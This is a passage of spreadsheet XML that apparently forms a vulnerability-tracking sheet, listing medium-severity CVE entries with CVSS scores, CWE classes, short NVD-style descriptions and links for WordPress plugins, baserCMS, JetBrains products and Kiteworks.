        </is>
      </c>
      <c r="P516" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S516" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in GiveWP &lt;= 4.16.9 versions.</t>
        </is>
      </c>
      <c r="T516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97066</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97078</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S517" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in Client Invoicing by Sprout Invoices &lt;= 20.8.17 versions.</t>
        </is>
      </c>
      <c r="T517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97078</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97249</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S518" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Bypass Vulnerability in Paid Member Subscriptions &lt;= 3.0.9 versions.</t>
        </is>
      </c>
      <c r="T518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97249</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97259</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S519" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key vulnerability in WP Hosting AS Pay with Vipps for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Pay with Vipps for WooCommerce: from n/a through 6.2.4.</t>
        </is>
      </c>
      <c r="T519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97259</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97261</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S520" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in Notivo &lt;= 1.4.2 versions.</t>
        </is>
      </c>
      <c r="T520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97261</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97282</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S521" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in Review Schema &lt;= 3.1.0 versions.</t>
        </is>
      </c>
      <c r="T521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97282</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97302</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr"/>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S522" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in MPG &lt;= 4.2.3 versions.</t>
        </is>
      </c>
      <c r="T522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97302</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102459</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S523" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has a Reflected Cross-site Scripting vulnerability. Unauthenticated remote attackers can execute arbitrary JavaScript codes in user's browser through phishing attacks.</t>
        </is>
      </c>
      <c r="T523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102459</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93460</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S524" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting vulnerability via appended strings in email form fields exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.</t>
        </is>
      </c>
      <c r="T524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93460</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93463</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S525" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Scripting via Script Validation Bypass exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser may be caused.</t>
        </is>
      </c>
      <c r="T525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93463</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93464</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S526" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting vulnerability via custom content descriptions exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.</t>
        </is>
      </c>
      <c r="T526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93464</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100272</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S527" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 missing authorisation in the notification template preview allowed Project Administrators to read restricted issues</t>
        </is>
      </c>
      <c r="T527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100272</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100278</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S528" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 users with restricted permission could edit and hide other users' comments</t>
        </is>
      </c>
      <c r="T528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100278</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102111</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="S529" s="5" t="inlineStr">
        <is>
          <t>Kiteworks did not enforce the maximum permitted value for a configurable security-policy setting. An authenticated administrator could set this value outside its intended range so that the associated control never activated, while the control continued to appear enabled in the administrative interface and audit log, allowing it to be silently rendered ineffective.</t>
        </is>
      </c>
      <c r="T529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102111</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102140</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S530" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator could initiate an administrative import using a file whose contents were not fully verified, because the import validated only the file's header rather than the complete file. This could allow unverified or forged content to be accepted and processed, affecting the integrity of the imported data.</t>
        </is>
      </c>
      <c r="T530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102140</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97246</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S531" s="5" t="inlineStr">
        <is>
          <t>Subscriber PHP Object Injection in ShortPixel Image Optimizer &lt;= 6.5.5 versions.</t>
        </is>
      </c>
      <c r="T531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97246</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100265</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S532" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Rider before 2026.2.1 aI Assistant could auto-update third-party skills without user confirmation</t>
        </is>
      </c>
      <c r="T532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100265</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92899</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S533" s="5" t="inlineStr">
        <is>
